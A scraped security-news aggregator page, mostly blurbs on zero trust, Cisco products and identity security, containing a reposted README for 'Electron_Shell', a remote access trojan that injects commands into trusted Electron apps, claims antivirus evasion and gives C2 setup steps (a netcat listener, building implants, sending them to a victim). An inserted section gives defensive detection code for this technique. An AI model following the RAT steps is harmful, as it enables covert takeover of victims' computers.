Simplifying Zero Trust Security for the Modern Workplace

Cisco's User Protection Suite now includes Identity Services Engine (ISE), enabling organizations to achieve zero trust for the workplace.

The Customer Adoption Journey of Cisco Secure Workload

Explore the customer adoption journey of Cisco Secure Workload, with key stages and best practices for successful implementation highlighted.

Cisco Secure Workload: Leading in Segmentation Maturity

As cyber threats evolve, defending workloads in today's multi-cloud environments requires more than traditional security. Attackers are no longer simply at the perimeter; they may already be inside, waiting to exploit vulnerabilities. This reality demands a shift from just keeping threats out to minimizing their impact when they breach. Cisco Secure Workload is at the […]

Business Leaderโ€™s Guide for a Successful Microsegmentation Project

One of the most effective strategies for protecting your digital assets is microsegmentation. Success depends on planning and on how it is implemented.

Youโ€™ve Heard the Security Service Edge (SSE) Story Before, but We Re-Wrote It!

Tech components like MASQUE, QUIC and VPP allow Cisco to overcome the limitations of last-gen ZTNA and SSE solutions. Learn how Cisco is rewriting the ZTA story.

Re-Imagining Zero Trust With an In-Office Experience, Everywhere

Cisco has designed our solution to overcome common obstacles by powering a secure, in-office experience anywhere that builds on Cisco's own zero trust journey.

Seamless Secure Work on a Plane

Learn how Cisco's User Protection Suite provides fast and secure connection to applications, even while traveling.

Bolster SaaS Security Posture Management with Zero Trust Architecture

Cisco and AppOmni have teamed to extend zero trust principles to secure SaaS applications and data with a closed loop zero trust architecture.

Cisco Enhances Zero Trust Access with Google

Cisco and Google are collaborating to help organizations block threats and secure access across internet destinations and private applications.

Windows 11 to Deprecate NTLM, Add AI-Powered App Controls and Security Defenses

Microsoft on Monday confirmed its plans to deprecate NT LAN Manager (NTLM) in Windows 11 in the second half of the year, as it announced a slew of new security measures to harden the widely-used desktop operating system. "Deprecating NTLM has been a huge ask from our security community as it will strengthen user authentication, and deprecation is planned in the second half of 2024," the

How Attackers Can Own a Business Without Touching the Endpoint

Attackers are increasingly making use of "networkless" attack techniques targeting cloud apps and identities. Here's how attackers can (and are) compromising organizations without ever needing to touch the endpoint or conventional networked systems and services. Before getting into the details of the attack techniques being used, let's discuss why

Behind the Scenes: The Art of Safeguarding Non-Human Identities

In the whirlwind of modern software development, teams race against time, constantly pushing the boundaries of innovation and efficiency. This relentless pace is fueled by an evolving tech landscape, where SaaS domination, the proliferation of microservices, and the ubiquity of CI/CD pipelines are not just trends but the new norm. Amidst this backdrop, a critical aspect subtly weaves into the

Implementing Zero Trust Controls for Compliance

The ThreatLocker® Zero Trust Endpoint Protection Platform implements a strict deny-by-default, allow-by-exception security posture to give organizations the ability to set policy-based controls within their environment and mitigate countless cyber threats, including zero-days, unseen network footholds, and malware attacks as a direct result of user error. With the capabilities of the

Cisco Secure Access named Leader in Zero Trust Network Access

Zero Trust Network Access (ZTNA) is a critical component to increase productivity and reduce risk in today's hyper-distributed environments. Cisco Secure Access provides a modern form of zero trust a… Read more on Cisco Blogs

Helping Ivanti VPN Customers

In January 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued a directive (with an update in February) mandating that all U.S. Federal agencies take Ivanti systems offline… Read more on Cisco Blogs

Cisco Secure Workload 3.9 Delivers Stronger Security and Greater Operational Efficiency

The proliferation of applications across hybrid and multicloud environments continues at a blistering pace. For the most part, there is no fixed perimeter; applications and environments are woven… Read more on Cisco Blogs

Mitigating Lateral Movement with Zero Trust Access

Security service edge (SSE) technology was created to protect remote and branch users with a unified, cloud-delivered security stack. To understand how SSE solutions protect organizations and their… Read more on Cisco Blogs

Superusers Need Super Protection: How to Bridge Privileged Access Management and Identity Management

Traditional perimeter-based security has become costly and ineffective. As a result, communications security between people, systems, and networks is more important than blocking access with firewalls. On top of that, most cybersecurity risks are caused by just a few superusers, typically one out of 200 users. There's a company aiming to fix the gap between traditional PAM and IdM

The Real Deal About ZTNA and Zero Trust Access

ZTNA hasn't delivered on the full promise of zero trust

Zero Trust has been all the rage for several years; it states, "never trust, always verify" and assumes every attempt to access the network or a… Read more on Cisco Blogs

NIS2 compliance for industrial networks: Are you ready?

Since the European Union (EU) signed the second version of the Network and Information Security (NIS2) Directive in December 2022, there has been a real frenzy all around Europe about it. NIS2 is now… Read more on Cisco Blogs

Why Are Compromised Identities the Nightmare to IR Speed and Efficiency?

Incident response (IR) is a race against time. You engage your internal or external team because there's enough evidence that something bad is happening, but you're still blind to the scope, the impact, and the root cause. The common set of IR tools and practices provides IR teams with the ability to discover malicious files and outbound network connections. However, the identity aspect - namely

Webinar โ€“ Leverage Zero Trust Security to Minimize Your Attack Surface

Digital expansion inevitably increases the external attack surface, making you susceptible to cyberthreats. Threat actors increasingly exploit the vulnerabilities stemming from software and infrastructure exposed to the internet; this ironically includes security tools, particularly firewalls and VPNs, which give attackers direct network access to execute their attacks. In fact, Gartner

Electron_Shell - Developing A More Covert Remote Access Trojan (RAT) Tool By Leveraging Electron's Features For Command Injection And Combining It With Remote Control Methods

By: Zion3R

Electron_shell

Developing a more covert Remote Access Trojan (RAT) tool by leveraging Electron's features for command injection and combining it with remote control methods.

Read More: [AOH 024] Exploring an automated way to parasitize a shell inside Electron programs

Features

  • Supports almost all operating systems

    • mac
    • linux
    • windows
  • Supports almost all desktop applications developed based on Electron

  • All malicious operations are executed by the injected program, i.e. a commonly used, trusted application

  • Bypasses per-application network access control policies enforced by zero-trust sandboxes, since the traffic originates from the injected, trusted program

  • Verified by the project not to be detected by the antivirus products below

    (Note that only a simple command call has been implemented here; some behaviour-based heuristic checks will still alert. AV bypass is not a key issue this project addresses.)

    • Windows Defender
    • Avast
    • Huorong (火绒)
    • 360
    • Tencent PC Manager (腾讯管家)
    • VirusTotal

Intro

An increasing number of desktop applications are opting for the Electron framework.

Electron applications can be debugged, usually through Chrome's inspect interface or by enabling inspect through Node.js. This project analysed how inspect is implemented and developed a method for automatically parasitizing common Electron programs.

By establishing a connection with the Command and Control (C2) server, a simple remote control is achieved.

Because most antivirus software trusts these well-known, digitally signed applications, executing malicious commands in the application's process context gives excellent concealment and stability.

Consider carefully the legal risk of injecting into these applications. When users analyse the behaviour, they may be surprised to find that the parent process of the malicious activity is an application they trust.
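Added example, not code from Electron_shell or from the page: detection logic for the two traits the Intro describes, a trusted Electron binary driven through its debug/inspect interface and a shell spawned by a trusted Electron app. It runs over a constructed process snapshot. The record shape, the illustrative ELECTRON_APPS list, and the specific things watched (the `--inspect` and `--remote-debugging-port` switches and the `ELECTRON_RUN_AS_NODE` environment variable, which are documented Node/Electron debugging features, not anything the README names) are assumptions.

```javascript
// Added example, not Electron_shell's own code. Scores process records for the
// two observable traits the README describes: an Electron binary started with a
// debug/inspect switch (or run as plain Node), and a shell whose parent is a
// trusted Electron app. The record shape {pid, ppid, image, cmdline, env} and the
// ELECTRON_APPS list are assumptions for this demo.

// Documented Node/Electron debugging switches (assumed to be what "inspect" means
// in the README; the README does not say which switch it uses).
const DEBUG_SWITCHES = [
  /^--inspect(-brk)?(=\S*)?$/,             // Node.js inspector on the main process
  /^--remote-debugging-(port=\d+|pipe)$/,  // Chromium DevTools protocol
];

const SHELLS = new Set(['cmd.exe', 'powershell.exe', 'pwsh.exe', 'sh', 'bash', 'zsh']);

// Illustrative list of well-known Electron-based apps (assumption). In practice
// derive this from the binary itself, e.g. a resources/app.asar next to it.
const ELECTRON_APPS = new Set(['code.exe', 'slack.exe', 'discord.exe', 'teams.exe']);

// Split a command line into arguments, honouring double quotes (no escapes).
function tokenize(cmdline) {
  const out = [];
  const re = /"([^"]*)"|(\S+)/g;
  for (let m; (m = re.exec(cmdline)) !== null; ) out.push(m[1] ?? m[2]);
  return out;
}

function isElectronApp(proc) {
  return ELECTRON_APPS.has(proc.image.toLowerCase());
}

// Return one finding per suspicious process, highest score first.
function findings(procs) {
  const byPid = new Map(procs.map((p) => [p.pid, p]));
  const results = [];
  for (const p of procs) {
    const hits = [];
    if (isElectronApp(p)) {
      // Strong signal: a trusted Electron app exposing a debugger, or running
      // as bare Node via ELECTRON_RUN_AS_NODE.
      for (const arg of tokenize(p.cmdline).slice(1)) {
        if (DEBUG_SWITCHES.some((re) => re.test(arg))) hits.push({ score: 3, why: `debug switch ${arg}` });
      }
      if ((p.env || {}).ELECTRON_RUN_AS_NODE === '1') hits.push({ score: 3, why: 'ELECTRON_RUN_AS_NODE=1' });
    }
    // Weak signal: the README's "parent process ... comes from the application
    // they trust". VS Code's integrated terminal does this legitimately, hence
    // the low score; allowlist before alerting on it alone.
    const parent = byPid.get(p.ppid);
    if (parent && isElectronApp(parent) && SHELLS.has(p.image.toLowerCase())) {
      hits.push({ score: 1, why: `shell child of ${parent.image}` });
    }
    const score = hits.reduce((s, h) => s + h.score, 0);
    if (score > 0) results.push({ pid: p.pid, image: p.image, score, why: hits.map((h) => h.why) });
  }
  return results.sort((a, b) => b.score - a.score);
}

// Constructed snapshot (not real telemetry).
const SAMPLE = [
  { pid: 1, ppid: 0, image: 'explorer.exe', cmdline: '"C:\\Windows\\explorer.exe"' },
  { pid: 2, ppid: 1, image: 'Code.exe', cmdline: '"C:\\Program Files\\Microsoft VS Code\\Code.exe"' },
  { pid: 3, ppid: 1, image: 'slack.exe', cmdline: '"C:\\Users\\u\\AppData\\Local\\slack\\slack.exe" --inspect=9229' },
  { pid: 4, ppid: 3, image: 'cmd.exe', cmdline: 'cmd.exe /c whoami' },
  { pid: 5, ppid: 2, image: 'powershell.exe', cmdline: 'powershell.exe -NoLogo' },
  { pid: 6, ppid: 1, image: 'Discord.exe', cmdline: '"C:\\Users\\u\\AppData\\Local\\Discord\\Discord.exe"',
    env: { ELECTRON_RUN_AS_NODE: '1' } },
];

for (const f of findings(SAMPLE)) console.log(f.score, f.pid, f.image, f.why.join('; '));
```

On the sample, the two Electron processes carrying a debug switch or ELECTRON_RUN_AS_NODE score 3 and the two shell children score 1. On the hardening side, Electron's fuses let a vendor ship a binary with RunAsNode and EnableNodeCliInspectArguments switched off, which removes the two strong signals at the source for that application.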

Usage

C2 Server Setup

  1. Deploy a server and obtain a public IP address
  2. Then exec: nc -lvnp 8899

Generating Implants

  1. clone this project

  2. Modify build.config

    injected_app:  the Electron program you want to inject into
    c2: set c2_Public IP and c2_netcat Port
  3. Exec node build.js, then pkg it into an executable

  4. Send it to the victim and receive the electron_shell



Cyolo Product Overview: Secure Remote Access to All Environments

Operational technology (OT) cybersecurity is a challenging but critical aspect of protecting organizations' essential systems and resources. Cybercriminals no longer break into systems, but instead log in, making access security more complex and also more important to manage and control than ever before. In an effort to solve the access-related challenges facing OT and critical infrastructure

LastPass source code breach โ€“ incident response report released

Wondering how you'd handle a data breach report if the worst happened to you? Here's a useful example.

GitHub issues final report on supply-chain source code intrusions

Learn how to find out which apps you've given access rights to, and how to revoke those rights immediately in an emergency.

โŒ